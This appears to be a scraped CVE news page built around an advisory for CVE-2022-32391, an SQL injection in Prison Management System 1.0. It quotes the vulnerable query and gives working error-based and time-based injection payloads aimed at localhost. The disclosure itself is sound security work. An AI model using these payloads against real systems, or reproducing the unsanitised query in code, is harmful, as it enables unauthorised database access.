CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/actions/view_action.php:4

**CVE-2022-32391****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/actions/view_action.php:4

$qry = $conn\->query("SELECT \* from \`action\_list\` where id = '{$\_GET\['id'\]}' and delete\_flag = 0 ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/actions/view_action.php?id=1'-if(database()/**/=/**/'pms_db',0,1)%23
    
    # Time Based
    http://localhost/pms/admin/actions/view_action.php?id=1'-if(database()/**/like/**/'pms_db',0,sleep(1))%23

Headline

CVE-2022-32391: BugBounty/cve-2022-32391.md at main · Dyrandy/BugBounty

Error Based

Time Based

CVE: Latest News